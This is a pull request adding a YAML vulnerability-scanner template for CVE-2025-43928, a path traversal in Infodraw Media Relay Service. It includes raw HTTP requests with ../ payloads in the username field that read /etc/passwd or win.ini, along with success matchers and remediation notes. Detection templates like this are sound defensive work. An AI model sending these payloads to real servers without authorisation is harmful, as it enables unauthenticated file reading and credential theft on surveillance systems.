### PR TITLE
Add CVE-2025-43928 - Infodraw MRS Unauthenticated Path Traversal

### DIFF
--- a/http/cves/2025/CVE-2025-43928.yaml
+++ b/http/cves/2025/CVE-2025-43928.yaml
@@ -1,0 +1,68 @@
+id: CVE-2025-43928
+
+info:
+  name: Infodraw MRS <= 7.1.0.0 - Unauthenticated Path Traversal
+  author: ohmygod20260203
+  severity: high
+  description: |
+    Infodraw Media Relay Service (MRS) version 7.1.0.0 and possibly earlier versions contain
+    a path traversal vulnerability in the web server component (port 12654). The MRS web server
+    allows login with any arbitrary username without proper authentication. The username field
+    is used directly as a file path component, enabling directory traversal via ../ sequences.
+    An attacker can read arbitrary files from the system, including ServerParameters.xml which
+    contains administrator credentials in cleartext or MD5-hashed format. Both Linux and Windows
+    deployments are affected. The software is used by law enforcement agencies worldwide for
+    video surveillance, body cameras, and police drones.
+  impact: |
+    Unauthenticated attackers can read arbitrary files from the server, including configuration
+    files containing admin credentials. This can lead to full system compromise, especially
+    since MRS is used by law enforcement for surveillance operations.
+  remediation: |
+    Take the MRS application offline immediately and contact Infodraw for a security patch.
+    Restrict network access to port 12654 using a VPN or IP allowlist. Conduct forensic
+    investigation to determine if unauthorized access occurred.
+  reference:
+    - https://mint-secure.de/path-traversal-vulnerability-in-surveillance-software/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-43928
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cve-id: CVE-2025-43928
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 2
+    product: media_relay_service
+    vendor: infodraw
+  tags: cve,cve2025,infodraw,mrs,lfi,traversal,surveillance
+
+http:
+  - raw:
+      - |
+        POST /user HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=../../../../../../../../etc/passwd&password=
+
+      - |
+        POST /user HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=..\..\..\..\..\..\..\..\windows\win.ini&password=
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0"
+
+      - type: word
+        part: body
+        words:
+          - "[extensions]"
+          - "[fonts]"
+        condition: and


### PR DESCRIPTION
## CVE-2025-43928 — Infodraw Media Relay Service Path Traversal

### Description
Infodraw MRS ≤7.1.0.0 web server (port 12654) allows login with any arbitrary username without authentication. The username field is used directly as a file path component, enabling directory traversal via `../` sequences to read arbitrary files.

### Impact
- Read `/etc/passwd`, `ServerParameters.xml` (contains cleartext admin creds)
- Affects law enforcement surveillance systems worldwide (body cameras, police drones)
- Both Linux and Windows deployments vulnerable

### Template Details
- **Severity:** High (CVSS 7.2)
- **Requests:** 2 (Linux `/etc/passwd` + Windows `win.ini`, stop-at-first-match)
- **Verification:** Regex match for root user entry or Windows INI sections
- **No authentication required**

### References
- [Mint Secure Advisory](https://mint-secure.de/path-traversal-vulnerability-in-surveillance-software/)
- [MITRE CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-43928)